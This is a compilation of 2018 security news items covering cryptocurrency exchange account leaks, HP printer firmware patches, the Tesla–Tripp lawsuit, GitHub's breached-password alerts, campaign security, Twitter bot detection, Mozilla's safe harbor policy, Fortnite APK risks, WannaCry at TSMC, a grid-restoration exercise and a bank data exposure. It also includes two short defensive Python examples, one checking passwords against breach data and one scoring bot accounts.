Group-IB experts record a massive surge of user data leaks from cryptocurrency exchanges
7.8.2018 securityaffairs Cryptocurrency

Group-IB researchers have investigated user data leaks from cryptocurrency exchanges and have analyzed the nature of these incidents.
Security experts from Group-IB, an international company specializing in preventing cyberattacks and developing information security solutions, have investigated user data leaks from cryptocurrency exchanges and have analyzed the nature of these incidents. Within a year, the number of data leaks soared by 369%.

The USA, Russia and China are TOP-3 countries in which registered users became the victims of cyberattacks.

In 2017, when cryptocurrencies were gaining momentum, their record-breaking capitalization and a spike in Bitcoin’s exchange rate led to dozens of attacks on cryptocurrency services. Based on data obtained from the Group-IB Threat Intelligence (cyber intelligence) system, experts from the international company Group-IB have analyzed the theft of 720 user accounts (logins and passwords) from the 19 largest cryptocurrency exchanges.

January holidays for hackers: a 689% surge in the number of leaks

The report «2018 Cryptocurrency Exchanges. User Accounts Leaks Analysis» shows a steady increase in the number of compromised user accounts on cryptocurrency exchanges. In 2017, their number increased by 369% compared to 2016. The first month of 2018 set a record: due to growing interest in cryptocurrencies and the blockchain industry, in January the number of incidents jumped by 689% compared to the 2017 monthly average. The USA, Russia, and China are the countries where users are targeted most often. The study has shown that every third victim of the attack is located in the United States.


Toolkit and infrastructure used for attacks

Experts of Group-IB have identified 50 active botnets used for launching cyberattacks on cryptocurrency exchange users. The infrastructure used by cybercriminals is mainly based in the USA (56.1%), the Netherlands (21.5%), Ukraine (4.3%) and Russia (3.2%).


The attackers use an increasingly wide range of malicious software and update their tools on a regular basis. The most frequently used malicious software includes Trojans such as AZORult and Pony Formgrabber, as well as Qbot. At the same time, cybercriminals have modified tools previously used for attacks on banks and now successfully use them to hack cryptocurrency exchanges and gain access to users’ personal data.

What makes a successful attack possible?

This is one of the key issues covered in the Group-IB report. The answer is actually quite simple: disregard for information security and underestimating the capabilities of cybercriminals. The first and main cause is that both users and exchanges fail to use two-factor authentication. The second cause is disregard for basic security rules such as the use of complex and unique passwords.

Group-IB has analyzed 720 accounts and found that one out of five users chose a password shorter than 8 characters (see Figure).


Attack as a premonition

Experts of Group-IB draw a bleak conclusion: currently no cryptocurrency exchange, regardless of its size and track record, can guarantee absolute security to its users. At least 5 out of 19 exchanges in question fell victim to targeted cyberattacks widely covered by the media. These are Bitfinex, Bithumb, Bitstamp, HitBTC, Poloniex and, presumably, Huobi. There are various attack vectors: errors in the source code of the software, phishing attacks, unauthorized access to the user database, vulnerabilities related to storage and withdrawal of funds. However, all of them stem from the lack of attention to information security and protection of digital assets.

“Increased fraudulent activity and attention of hacker groups to cryptoindustry, additional functionality of malicious software related to cryptocurrencies, as well as the significant amounts of already stolen funds, signals that the industry is not ready to defend itself and protect its users”, says Ruslan Yusufov, the Director of Special Projects at Group-IB. “In 2018 we will see even more incidents. This situation requires prompt and effective response of all stakeholders, including experts in different areas.”

Recommendations of Group-IB experts to users and exchanges

In order to protect one’s funds against crypto-fraud, Group-IB recommends that users be mindful of their passwords (which should contain at least 14 unique symbols), never use the same passwords for different exchanges and always enable 2FA (two-factor authentication). Experts recommend avoiding the use of public Wi-Fi (at least when carrying out exchange transactions) and paying special attention to one’s “traces” on social media. For instance, users should not advertise the fact that they possess any cryptocurrency.

Recommendations to cryptoexchanges are also of high importance. First of all, they are strongly advised to make two-factor authentication obligatory for all the users and their operations, conduct regular security audits of IT infrastructure and related services, and allocate resources to training and awareness-raising concerning personnel security, starting from top management (founders) and down to rank-and-file employees. To improve the cybersecurity of cryptocurrency exchanges, experts also recommend installing Anti-APT solutions, using Threat Intelligence and implementing anti-fraud solutions, as well as behavioral analysis systems. Specialists also suggest preparing cybersecurity incident response plans which will minimize potential damage.


HP releases firmware updates for two critical RCE flaws in Inkjet Printers
7.8.2018 securityaffairs Vulnerability

HP has released firmware updates that address two critical remote code execution vulnerabilities in some models of inkjet printers.
HP has released firmware updates to address two critical RCE flaws affecting some Inkjet printers. The two flaws, tracked as CVE-2018-5924 and CVE-2018-5925, could be exploited by attackers to trigger a stack or static buffer overflow.

An attacker can exploit the vulnerabilities by sending a specially crafted file to the vulnerable inkjet printers.

“Two security vulnerabilities have been identified with certain HP Inkjet printers. A maliciously crafted file sent to an affected device can cause a stack or static buffer overflow, which could allow remote code execution.” reads the security advisory published by HP.

The flaws have been assigned a CVSS score of 9.8 and affect roughly 160 models, including PageWide, DesignJet, Officejet, Deskjet, Envy, and Photosmart.

To download the firmware updates, go to the HP Software and Drivers page for your product and find the appropriate firmware update from the list of available software.
Go to the Upgrading Printer Firmware page and follow the instructions provided to install the firmware.


Flaws in the firmware of printers are not a novelty. In November 2017, experts from the FoxGlove Security firm found a potentially serious remote code execution vulnerability in some of HP’s enterprise printers.

Recently HP launched a private bug bounty program that offers up to $10,000 to white hat hackers who discover serious issues in its printers.


Ex-Tesla Worker Accused of Hacking Seeks $1M in Counterclaim

6.8.2018 securityweek  Hacking


RENO, Nev. (AP) — A former Tesla Inc. employee at the electric car maker's battery plant in Nevada is seeking at least $1 million in defamation damages after the company accused him of sabotage, hacking into computers and stealing confidential information leaked to the media.

Lawyers for Martin Tripp filed a counterclaim in federal court this week alleging any damages Tesla incurred were caused or contributed to by Tesla's "own negligence, acts or omissions."

Tripp alleges that between $150 million and $200 million worth of battery module parts for Tesla's Model 3 vehicle were incorrectly handled as scrap earlier this year. He said more than 700 dented and/or punctured battery modules were not discarded and instead were being shipped or were in the process of being shipped to customers.

A punctured battery could pose a fire risk.

Tesla officials did not respond to repeated requests for comment from The Associated Press on Thursday.

Tripp said he was recruited by Tesla, moved to Sparks, Nevada, from Wisconsin and started working at the battery factory in October 2017 as a lead process engineering technician. He was fired June 19.

Tesla filed the lawsuit against Tripp on June 20, three days after Musk warned employees of sabotage from within the company.

In the months prior, Tripp witnessed "several concerning business practices" inconsistent with Tesla's representations to investors and the general public, according to his counterclaim filed in U.S. District Court in Reno on Tuesday.

Tripp said he repeatedly questioned supervisors about the large quantities of waste and scrap vehicle parts he observed "lying haphazardly on the ground inside the Gigafactory." But his concerns were never addressed or resolved, Tripp said.

Tripp said he emailed CEO Elon Musk directly about his concerns on May 16 before Musk was scheduled to visit the factory east of Sparks that night. Later that day, Tripp said his manager asked him to forward the email he sent to Musk "so that I can avoid getting fired tonight," according to the lawsuit.

His counterclaim says a design engineer also told Tripp to clean up the production line area so Musk wouldn't see the mounds of scrap and waste lying on the ground, but Tripp declined to do so because he wanted Musk "to see how the Gigafactory was actually being operated." He said he was reassigned to a different position the following day.

Tesla's original lawsuit said Tripp admitted to Tesla investigators that he wrote software that transferred several gigabytes of data outside the company, including dozens of photographs and a video, according to the lawsuit filed Wednesday. Hacking software from Tripp also was running on three computer systems of other employees "so that the data would be exported even after he left the company and so that those individuals would be falsely implicated," the lawsuit alleged.

The lawsuit said Tripp made false claims about the information he stole, including claims that Tesla used punctured battery cells in the Model 3, and claims about the amount and value of scrap material generated by Tesla's manufacturing process. Some of the claims made it into media stories about the company, but media organizations are not identified in the lawsuit.

Tripp, a former aviation electronics technician in the U.S. Navy who worked two decades in the electronic and engineering industries, said in his counterclaim he "did not sabotage Tesla or its operations" and his actions "were necessary, reasonable and/or privileged."

He acknowledged in the counterclaim that he had made claims about the scrap and punctured battery cells being used in Model 3 vehicles. But he said he did not direct code changes to the Tesla Manufacturing Operating System under false user names or export large amounts of highly sensitive Tesla data as Musk had asserted.

After he was reassigned to a new position, Tripp "learned of and witnessed additional unnerving, dangerous and wasteful business practices," including employees systematically reusing parts and battery cells that had been previously discarded as waste, the suit said.

The scrap problem dramatically increased in March 2018 when Tesla initiated a company-wide effort to reach its publicized goal of producing 2,500 Model 3 vehicles per week, the lawsuit said. It said the production push — with an objective of making 5,000 vehicles per week by July 2018 — was known as the "March to 2,500."


GitHub to Warn Users on Compromised Passwords
6.8.2018 securityweek  Incident

In a move to protect its users, software repository site GitHub is now alerting account holders whenever it detects that a password has been compromised in breaches on other services.

Security experts have long pushed for the use of long, unique passwords, to ensure stronger security of all online accounts. However, even unique passwords can pose a great risk when compromised, especially if attackers can link them to specific accounts.

The new feature is the result of a partnership with Troy Hunt, the security researcher behind the popular HaveIBeenPwned.com project. The service allows users to check whether their accounts and passwords have appeared in any data breaches.

An internal tool GitHub has created is now taking advantage of a 517 million record dataset that Hunt made available for download through his service to “validate whether a user’s password has been found in any publicly available sets of breach data.”

The open-source software repository platform enabled the feature last week. The functionality, it says, is meant to alert all people who are using compromised passwords and prompt them to select a different one during login, registration, or when updating their password.

“Don’t worry, your password is protected by the password hashing function bcrypt in our database. We only verify whether your password has been compromised when you provide it to us,” GitHub explains.

Users who have two-factor authentication (2FA) enabled will receive periodic warnings to review the 2FA setup and recovery options, GitHub also reveals.

However, traditional 2FA options such as SMS have proven to be unreliable, and all of the online platform’s users are advised to use a 2FA authenticator application that supports cloud backups, to ensure a recovery option is always available for them.

“These new account security enhancements will help improve the security of your account. We hope you will take this opportunity to review the security of your account. Balancing security, usability, and recoverability is a personal decision,” GitHub notes.

The service’s users are advised to generate strong, unique passwords using a dedicated manager, to enable 2FA, and to make sure an account-recovery method is available. They should also update their primary email address if necessary and review their other credentials on the platform, GitHub says.
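As an added example (not GitHub's code), the check described above: a handler that hashes the password the user just supplied, looks the hash up in a locally downloaded breach list, and also applies the minimum-length rule Group-IB recommends earlier on this page. Assumptions: the `SHA1HEX:count` line format of the downloadable Pwned Passwords list, and the sample entries, which are constructed here rather than taken from real breach data.

```python
import hashlib
from typing import Dict, Tuple

# Constructed sample of a downloaded breach-hash list. Each line is
# "SHA1HEX:count" (assumption: this follows the Pwned Passwords download
# format); the entries are generated here for the example and are not
# real breach data.
SAMPLE_BREACH_LIST = "\n".join(
    hashlib.sha1(pw).hexdigest().upper() + ":" + str(n)
    for pw, n in [(b"password123", 1234567),
                  (b"correct horse battery", 42),
                  (b"qwerty", 9876543)]
)

MIN_LENGTH = 14  # Group-IB's recommendation in the report above


def load_breach_index(text: str) -> Dict[str, int]:
    """Parse 'HASH:count' lines into a lookup table keyed by SHA-1 hex digest."""
    index: Dict[str, int] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        digest, _, count = line.partition(":")
        index[digest.upper()] = int(count or 0)
    return index


def breach_count(password: str, index: Dict[str, int]) -> int:
    """How many times the password appeared in the breach data (0 if never).
    Only the SHA-1 digest is looked up; the plaintext is used transiently,
    at the moment the user supplies it, as GitHub describes."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return index.get(digest, 0)


def evaluate_password(password: str, index: Dict[str, int],
                      min_length: int = MIN_LENGTH) -> Tuple[bool, str]:
    """Policy applied at registration, login and password change.
    Returns (accepted, reason). A breached password is rejected even when
    it is long, because an attacker already holds it. An accepted password
    is then hashed with bcrypt for storage (not shown here)."""
    count = breach_count(password, index)
    if count:
        return False, f"password appeared in breach data {count} times"
    if len(password) < min_length:
        return False, f"password shorter than {min_length} characters"
    return True, "ok"


if __name__ == "__main__":
    index = load_breach_index(SAMPLE_BREACH_LIST)
    for candidate in ["password123", "short1", "correct horse battery",
                      "a long and unique passphrase"]:
        print(candidate, "->", evaluate_password(candidate, index))
```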

GitHub, which will soon become part of Microsoft, has made other security improvements as well, including enforcing SSL/TLS. This, however, did not stop hackers from compromising accounts to spread malicious code, as was the case with the recent Gentoo incident.


HP Patches Critical RCE Flaws in Inkjet Printers
6.8.2018 securityweek  Vulnerability

HP has released firmware updates for many of its inkjet printers to address a couple of critical vulnerabilities that can be exploited for remote code execution.

According to the HP Product Security Response Team (PSRT), the company’s Inkjet printers are affected by flaws that allow an attacker to trigger a stack or static buffer overflow and execute arbitrary code by sending a specially crafted file to an affected device.

The vulnerabilities are tracked as CVE-2018-5924 and CVE-2018-5925, and they have both been assigned a CVSS score of 9.8.

HP has shared a list of roughly 160 impacted products, including PageWide, DesignJet, Officejet, Deskjet, Envy and Photosmart devices. The firmware updates for each impacted product can be obtained from HP’s website.

This is not the first time a remote code execution flaw has been found in HP printers. Last year, researchers discovered several potentially serious vulnerabilities in some of HP’s enterprise printers, including an RCE bug affecting LaserJet Enterprise, PageWide Enterprise, LaserJet Managed and OfficeJet Enterprise printers.

HP recently announced the launch of a private bug bounty program that offers up to $10,000 for serious vulnerabilities found in the company’s printers. HP had invited 34 researchers by the time the initiative was unveiled.

The program covers HP LaserJet Enterprise printers and MFPs (A3 and A4), as well as the HP PageWide Enterprise printers and MFPs (A3 and A4).


Campaigns on Their Own as Cyber Threats Roil Midterms
6.8.2018 securityweek  Cyber

NEW YORK (AP) — Kamala Harris has been the target of social media misinformation campaigns since she became a U.S. senator.

Every month for the last 18 months, her office has discovered on average between three and five fake Facebook profiles pretending to be hers, according to a Harris aide. It's unclear who creates the pages, which are often designed to mislead American voters about the ambitious Democratic senator's policies and positions.

The aide spoke on the condition of anonymity, like more than a half dozen campaign officials contacted for this story, for fear of attracting unwanted attention from adversaries or scrutiny on the Senate office's evolving cybersecurity protocols.

Such internet mischief has become commonplace in U.S. politics. Facebook announced earlier this week that it uncovered "sophisticated" efforts, possibly linked to Russia, to influence U.S. politics on its platforms. Senior intelligence officials declared Thursday that foreign adversaries continue waging a quiet war against U.S. campaigns and election systems.

Still, one thing has become clear: With the midterm elections just three months away, campaigns are largely on their own in the increasingly challenging task of protecting sensitive information and countering false or misleading content on social media.

The Democratic National Committee has worked to strengthen its own internal security protocols and encouraged state parties to do the same, according to Raffi Krikorian, who previously worked for Uber and Twitter and now serves as the DNC's chief technology officer.

But in an interview, he acknowledged there are limits to how much the national party can protect the thousands of Democratic campaigns across the country.

"We're providing as much assistance to campaigns as we can, but there's only so much we can do," Krikorian said.

"For all the high-level campaigns I'm worried, but at least there are people to talk to," he continued. "The mid-sized campaigns are at least getting technical volunteers, but the truly down-ballot campaigns, that's where the state parties and coordinated campaigns can help, but there's no doubt that this is an uphill battle when we're dealing with a foreign adversary."

Officials in both political parties have intensified cybersecurity efforts, although the known cases of interference have so far overwhelmingly focused on Democrats.

The DNC now has a staff of 40 on its technical team, led by Krikorian and other Silicon Valley veterans hired in the months after Russians hacked the party's email system and released a trove of damaging messages in the months before President Donald Trump's 2016 victory.

Top U.S. intelligence and homeland security officials raised new alarms Thursday about outside efforts to influence the 2018 and 2020 elections during a White House press briefing.

Homeland Security chief Kirstjen Nielsen said: "Our democracy is in the crosshairs," while Director of National Intelligence Dan Coats added: "We continue to see a pervasive messaging campaign by Russia to try to weaken and divide the United States."

Facebook said it removed 32 accounts from its site and Instagram because they were involved in "coordinated" political behavior and appeared to be fake. Nearly 300,000 people followed at least one of the accounts, which featured names such as "Black Elevation" and "Resisters" and were designed to manipulate Americans with particular ethnic, cultural or political identities.

In many cases, House and Senate political campaigns said they're just beginning to adopt basic internal security protocols, such as two-step verification for all email, storage and social media accounts and encrypted messaging services such as Wickr.

There is no protocol in place for campaigns or national parties to monitor broader social media misinformation campaigns, however. Nor is there any sign that law enforcement is playing a proactive role to protect campaigns from meddling on a day-to-day basis.

The FBI has set up a Foreign Influence Task Force and intelligence agencies are collecting information on Russian aggression, but campaigns report no regular contact with law enforcement officials.

"At the end of the day, the U.S. government is not putting any type of a bubble around any (campaign). They do not have the authority, capacity or capability to do it," said Shawn Henry, a former senior FBI official who now leads the cybersecurity firm CrowdStrike, which works with political campaigns. "NSA is not sitting in the ISPs filtering out malicious traffic."

Henry added: "They've got to take pro-active actions themselves."

Earlier this month, Microsoft said it discovered a fake domain had been set up as the landing page for phishing attacks by a hacking group believed to have links to Russian intelligence. A Microsoft spokesman said this week that additional analysis confirmed the attempted attacks occurred in late 2017 and targeted multiple accounts associated with the offices of two legislators running for re-election. Microsoft did not name the lawmakers.

Sen. Claire McCaskill, D-Mo., said Russian hackers tried unsuccessfully to infiltrate her Senate computer network in 2017. Former Democratic U.S. Rep. Brad Ashford of Nebraska also recently confirmed that his 2016 campaign emails had been hacked by Russian agents.

Ashford, who narrowly lost his seat to Republican Don Bacon that year, said hackers obtained all of his campaign email correspondence with the Democratic Congressional Campaign Committee. He said he was notified of the breach in late July or early August 2016 by House Democratic Leader Nancy Pelosi's office.

Ashford has said he doesn't believe any of the stolen information ever went to Bacon or the Republican Party, and he doesn't know whether it made a difference in his race. He did face a series of anonymous political attacks on social media.

By their very nature, U.S. political campaigns can be a challenge to defend from a cybersecurity standpoint. They are essentially pop-up organizations that rely heavily on volunteers and are focused on a singular task — winning. In addition, high-level IT expertise costs money and campaigns typically run on tight budgets.

Some 2018 House campaigns have yet to hire basic communications staffers.

In the case of California Sen. Harris, who is considered a 2020 presidential prospect, her office plans to continue rooting out fake social media profiles on its own. They have had no contact with the FBI. They have reported the issue to Facebook in every case — not the other way around.

"It's on the forefront of everybody's mind," said Patrick McHugh, a former Senate campaign official who now leads the Democratic-aligned super PAC Priorities USA.

He acknowledged the tremendous challenge for many campaigns.

"All it takes is one person on a campaign to make a mistake," McHugh said. "You're up against a foreign country. That's a pretty big adversary that can and will go to all ends to get in."


New Open Source Tools Help Find Large Twitter Botnets
6.8.2018 securityweek  BotNet

Duo Security has created open source tools and disclosed techniques that can be useful in identifying automated Twitter accounts, which are often used for malicious purposes.

The trusted access solutions provider, which Cisco recently agreed to acquire for $2.35 billion, has collected and studied 88 million Twitter accounts and over half-a-billion tweets. Based on this data, which the company says is one of the largest random datasets of Twitter accounts analyzed to date, researchers were able to create algorithms for differentiating humans from bots.

The dataset, collected using Twitter’s API, includes profile name, tweet and follower count, avatar, bio, content of tweets, and social network connections.

Researchers created their tools and techniques for identifying bots based on 20 unique account characteristics, including the number of digits in a screen name, followers/following ratio, number of tweets and likes relative to the account’s age, number of users mentioned in a tweet, number of tweets with the same content, percentage of tweets with URLs, time between tweets, and average hours tweeted per day.

Tests conducted by experts led to the discovery of a sophisticated cryptocurrency-related scam botnet powered by at least 15,000 bots. These accounts were designed to use deceptive behaviors to avoid automatic detection, while attempting to obtain money from users by spoofing cryptocurrency exchanges, celebrities and news organizations.
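An added example (not Duo Security's tooling) that computes several of the per-account characteristics listed above and turns them into a simple bot score. The thresholds, the scoring rule, and both sample accounts are assumptions constructed for illustration, not Duo's model or real Twitter data.

```python
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Tweet:
    text: str
    hour: int        # hour of day (0-23) the tweet was posted
    has_url: bool


@dataclass
class Account:
    screen_name: str
    age_days: int
    followers: int
    following: int
    likes: int
    tweets: List[Tweet]


def account_features(a: Account) -> Dict[str, float]:
    """A subset of the characteristics named in the article: digits in the
    screen name, followers/following ratio, tweets and likes relative to
    account age, share of tweets with URLs, share of duplicated tweet text,
    and how many distinct hours of the day the account tweets in."""
    n = max(len(a.tweets), 1)
    age = max(a.age_days, 1)
    texts = Counter(t.text for t in a.tweets)
    duplicates = sum(c - 1 for c in texts.values())
    return {
        "digits_in_name": sum(ch.isdigit() for ch in a.screen_name),
        "follow_ratio": a.followers / max(a.following, 1),
        "tweets_per_day": len(a.tweets) / age,
        "likes_per_day": a.likes / age,
        "pct_with_url": 100.0 * sum(t.has_url for t in a.tweets) / n,
        "pct_duplicate": 100.0 * duplicates / n,
        "hours_active": len({t.hour for t in a.tweets}),
    }


# Assumed thresholds for this example (not Duo's model): each rule that
# fires adds one point to the bot score.
RULES = [
    ("digits_in_name", lambda v: v >= 4),
    ("follow_ratio", lambda v: v < 0.05),   # follows far more than it is followed
    ("tweets_per_day", lambda v: v > 5),
    ("pct_with_url", lambda v: v > 80),
    ("pct_duplicate", lambda v: v > 50),
    ("hours_active", lambda v: v >= 20),    # posts around the clock
]
SUSPICIOUS_AT = 3


def bot_score(a: Account) -> int:
    f = account_features(a)
    return sum(1 for name, rule in RULES if rule(f[name]))


def is_suspicious(a: Account) -> bool:
    return bot_score(a) >= SUSPICIOUS_AT


# Constructed sample accounts: an ordinary user and a giveaway-scam bot of
# the kind the article describes (names, numbers and tweets are made up).
HUMAN = Account("alice_dev", age_days=2000, followers=300, following=250,
                likes=4000, tweets=[
                    Tweet("morning coffee", 8, False),
                    Tweet("shipped a fix", 14, False),
                    Tweet("good read", 20, True),
                    Tweet("weekend hike", 11, False)])
BOT = Account("bitcoin_giveaway_48291", age_days=5, followers=12,
              following=4000, likes=0, tweets=[
                  Tweet("Giveaway! Verify your wallet at example.com/claim",
                        h % 24, True) for h in range(48)])

if __name__ == "__main__":
    for acct in (HUMAN, BOT):
        print(acct.screen_name, bot_score(acct), is_suspicious(acct))
```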

Duo Security informed Twitter of its findings. The social media giant says it’s aware of the problem and claims it’s proactively implementing mechanisms to detect problematic accounts.

“Spam and certain forms of automation are against Twitter's rules. In many cases, spammy content is hidden on Twitter on the basis of automated detections. When spammy content is hidden on Twitter from areas like search and conversations, that may not affect its availability via the API. This means certain types of spam may be visible via Twitter's API even if it is not visible on Twitter itself. Less than 5% of Twitter accounts are spam-related,” Twitter said.

Duo Security has published a 46-page research paper describing its findings and techniques. The company will release its tools as open source on August 8 at the Black Hat conference in Las Vegas.

“Malicious bot detection and prevention is a cat-and-mouse game,” explained Duo Principal R&D Engineer Jordan Wright. “We anticipate that enlisting the help of the research community will enable discovery of new and improving techniques for tracking bots. However, this is a more complex problem than many realize, and as our paper shows, there is still work to be done.”


Mozilla to Researchers: Stay Away From User Data and We Won’t Sue
6.8.2018 securityweek  Security

Security researchers looking to find bugs in Firefox should not worry about Mozilla suing them, the Internet organization says. That is, of course, as long as they don’t mess with user data.

Mozilla, which has had a security bug bounty program for over a decade, is discontent with how legal issues are interfering with the bug hunting process and has decided to change its bug bounty program policies to mitigate that.

Because legal protections afforded to those participating in bounty programs failed to evolve, security researchers are often at risk, and the organization is determined to offer a safe harbor to those researchers seeking bugs in its web browser.

According to the Internet organization, bug bounty participants could end up punished for their activities under the Computer Fraud and Abuse Act (CFAA), the anti-hacking law that criminalizes unauthorized access to computer systems.

“We often hear of researchers who are concerned that companies or governments may take legal actions against them for their legitimate security research. […] The policy changes we are making today are intended to create greater clarity for our own bounty program and to remove this legal risk for researchers participating in good faith,” Mozilla says.

For that, the browser maker is making two changes to its policy. On the one hand, the organization has clarified what is in scope for its bug bounty program, while on the other it has reassured researchers it won’t take legal action against them if they don’t break the rules.

Now, Mozilla makes it clear that participants in its bug bounty program “should not access, modify, delete, or store our users’ data.” The organization also says that it “will not threaten or bring any legal action against anyone who makes a good faith effort to comply with our bug bounty program.”

Basically, the browser maker says it won’t sue researchers under any law (the DMCA and CFAA included) or under its applicable Terms of Service and Acceptable Use Policy for their research performed as part of the bug bounty program.

“We consider that security research to be ‘authorized’ under the CFAA,” Mozilla says.

These changes, which are available in full in the General Eligibility and Safe Harbor sections of the organization’s main bounty page, should help researchers know what to expect from Mozilla.


Fortnite APK is coming soon, but it will not be available on the Google Play Store
6.8.2018 securityaffairs Android

Fortnite, the most popular game, will soon be available for Android users, but the Fortnite APK will not be in the Play Store.
Fortnite continues to be the most popular game; it is a co-op sandbox survival game developed by Epic Games and People Can Fly.

The great success of Fortnite has attracted cybercriminals who attempt to exploit its popularity to target its fans.

Unfortunately for Android users, Fortnite for Android devices is not available yet; it is currently under development, while the iOS version was released in March by Epic Games.

In recent months, crooks have attempted to take advantage of Android users’ interest in an alleged version of the popular game for their devices.

Experts discovered many blog posts and video tutorials with instructions for installing fake Fortnite Android apps.

Scammers are exploiting this interest to trick Android fans into downloading tainted versions of the game that can compromise Android devices.


Now there is news for the Android fans of the popular game: Epic Games confirmed that the Fortnite APK for Android will be available for download exclusively through its official website and not through the official Google Play Store.

According to Epic Games CEO Tim Sweeney, in this way the company will “have a direct relationship” with its consumers and will save the 30 percent fee that Google keeps when users download software from the Play Store.

“The awesome thing about Fortnite is it’s brought a huge volume of digital commerce to Epic. We can now do that very efficiently. We can handle payment processing and customer support and download bandwidth with some great deals. We’re passing the savings along with the Unreal Engine Marketplace. We’ve changed the royalty split from the 30/70 you see everywhere to developers getting 88 percent. We find that’s a great boon for developers.” Sweeney told GamesBeat.

Sweeney explained that the revenue share taken on Microsoft and Nintendo platforms is justified by their “enormous investment in hardware, often sold below cost, and marketing campaigns in broad partnership with publishers.”

Sweeney considers the 30% cut Google takes for its services disproportionate, but evidently does not weigh the security features of the Google store that stop crooks from serving tainted versions of the Fortnite APK.

Even though several malicious apps have been found on the Play Store in the past, Google’s efforts to protect its users should not be underestimated.

The availability of Fortnite APK on a third-party website could expose Android users to the risk of infection.

Installing an APK obtained outside the official store requires manually enabling the “Install Apps from Unknown Sources” option in the settings.

A large number of Android users will search for “how to install Fortnite on Android,” and these fans could be targeted in various ways, for example by black SEO campaigns devised to infect their devices.

“The move will simply encourage users to manually enable “Install Apps from Unknown Sources” option in the settings menu or accept a variety of Android security prompts in order to install Fortnite game directly from the Epic Games website.” reported The Hacker News.

“So, thousands of people out there searching, “how to install Fortnite on Android” or “how to download Fortnite APK for Android” on the Internet, could land themselves on unofficial websites, ending up installing malware.”

To install Fortnite on Android, players have to download the Fortnite Launcher from the official Epic website; the launcher then downloads Fortnite Battle Royale onto their devices.

Attackers can impersonate the legitimate source, for example by running phishing campaigns that trick Android users into downloading a tainted version of the Fortnite APK from a lookalike site.


Chip Giant TSMC Says WannaCry Behind Production Halt
6.8.2018 securityweek
Ransomware

TSMC Chip Factory hit by Malware

Image Source: Taiwan Semiconductor Manufacturing Co., Ltd.

Chipmaker giant Taiwan Semiconductor Manufacturing Co (TSMC) said Monday the computer virus that brought its production to a halt for two days was a variant of the WannaCry ransomware that hit users all around the world.

WannaCry infected more than 200,000 users in more than 150 countries last year, encrypting user files and demanding ransom payments from their owners to get them back.

TSMC, a key Apple supplier, said some of its computer systems and equipment in its Taiwan plants were infected on August 3 during a software installation, which is expected to cause shipment delays and cut third-quarter revenue by about two percent.

It comes as Apple is set to release new iPhone models later this year.

TSMC declined to specify which customers and products are affected by the brief outage, but it said no confidential information was compromised.

Chief Executive Officer C.C. Wei told reporters and analysts on Monday that the virus has been eliminated and all production is back online.

Wei ruled out a targeted hack, attributing the incident to employees failing to run virus scans properly before the installation.

"This is purely our negligence so I don't think there is any hacking behaviour," he said.

"We regret this. There won't be any more human errors," said Wei.

He added that TSMC will develop a more automated anti-virus procedure going forward.

The firm said it is in close contact with its customers to minimise the impact, and maintains its sales growth outlook for the year.


Dept. of Energy announced the Liberty Eclipse exercise to test electrical grid against cyber attacks
6.8.2018 securityaffairs Attack

DoE announced the Liberty Eclipse exercise to test the electrical grid’s ability to recover from a blackout caused by cyberattacks.
This is the first time the Department of Energy will test the electrical grid’s ability to recover from a blackout caused by cyberattacks.

We have discussed the effects of a cyber attack against an electrical grid many times; the most frightening scenario is a wide power outage leaving the population in the dark.

Is this a feasible scenario for the US critical infrastructure?

The Department of Energy wants to test the resilience of the electrical grid to a cyber attack, so it is launching the first hands-on exercise that tests the ability of grid operators to recover from a blackout caused by a cyber attack.

According to the E&E News website, the Department of Energy plans to conduct a weeklong experiment, dubbed ‘Liberty Eclipse,’ starting Nov. 1 on Plum Island, a restricted site off the coast of New York.

“The Department of Energy is planning an unprecedented, “hands-on” test of the grid’s ability to bounce back from a blackout caused by hackers, E&E News has learned.” reported the E&E News website.

“The “Liberty Eclipse” exercise will simulate the painstaking process of re-energizing the power grid while squaring off against a simultaneous cyberattack on electric, oil and natural gas infrastructure. The weeklong stress test is scheduled to take place this November on Plum Island, a restricted site off the coast of New York that houses a Department of Homeland Security animal disease center.”

This is the first time the Department of Energy has planned such a “hands-on” test of the grid’s ability to restore operations after a blackout caused by a cyber attack. The “Liberty Eclipse” exercise evaluates the response to coordinated attacks against electric, oil and natural gas infrastructure; the DOE wants to prepare the country’s infrastructure for such threats.

“It’s in our national security interest to continue to protect these sources of energy and to deliver them around the world,” Energy Secretary Rick Perry said at a cybersecurity conference in New York last week.

“Taking care of that infrastructure, from the standpoint of protecting it from cyberattacks — I don’t think it’s ever been more important than it is today.”

electrical grid

The goal of the Liberty Eclipse exercise is to prepare the response to a major incident caused by cyber attacks, which could become frequent in the near future. Utilities restoring electricity after a massive blackout first need an initial jolt of electricity before power plants can start generating it.

Operators do this with diesel generators and other blackstart sources, choreographing “cranking paths” that bring the grid back up piece by piece.

“Utilities can’t just flip a few switches to bring the lights on following a major shutdown. In fact, power plants typically need an initial jump of electricity before they can start generating it,” continues the E&E News website. “Power companies rely on diesel generators and other blackstart sources to choreograph ‘cranking paths’ for bringing the grid on its feet. Once enough pockets of electricity have been brought online, operators can sync up the islands with the wider grid.”

The entire process is time-consuming and can take many hours to be completed, even under the most favorable circumstances.

The DOE aims to speed up grid restoration by incorporating into the exercise simulated cranking paths built by the Defense Advanced Research Projects Agency for this purpose.

“Together, [participants] will work to energize a blackstart cranking path by detecting the attack, cleaning malicious influence, and restoring crank path digital systems to operation,” the DOE states in a planning memo from last month.

This is the first exercise to test the “blackstart” cranking paths, which were left out of previous simulations.


TCM Bank: website misconfiguration exposed applicant data for 16 months
6.8.2018 securityaffairs Hacking

TCM Bank announced that a Web site misconfiguration exposed applicant data for 16 months, between early March 2017 and mid-July 2018
TCM Bank, a subsidiary of ICBA Bancard, acts as a trusted advisor to community banks and as a direct issuer of credit cards for more than 750 small and community U.S. banks that prefer not to issue cards themselves.

TCM Bank announced that a Web site misconfiguration exposed applicant data for 16 months, including names, addresses, dates of birth and Social Security numbers.

“In a letter being mailed to affected customers today, TCM said the information exposed was data that card applicants uploaded to a Web site managed by a third party vendor.” wrote the investigative journalist Brian Krebs.

“TCM said it learned of the issue on July 16, 2018, and had the problem fixed by the following day.”

Thousands of people who applied for cards between early March 2017 and mid-July 2018 were affected by the incident.

The company is notifying affected customers by letter; the exposed data had been uploaded by card applicants to a Web site managed by a third-party vendor.

Bruce Radke, an attorney assisting TCM, confirmed that fewer than 10,000 customers were affected.

“It was less than 25 percent of the applications we processed during the relevant time period that were potentially affected, and less than one percent of our cardholder base was affected here,” Radke said.

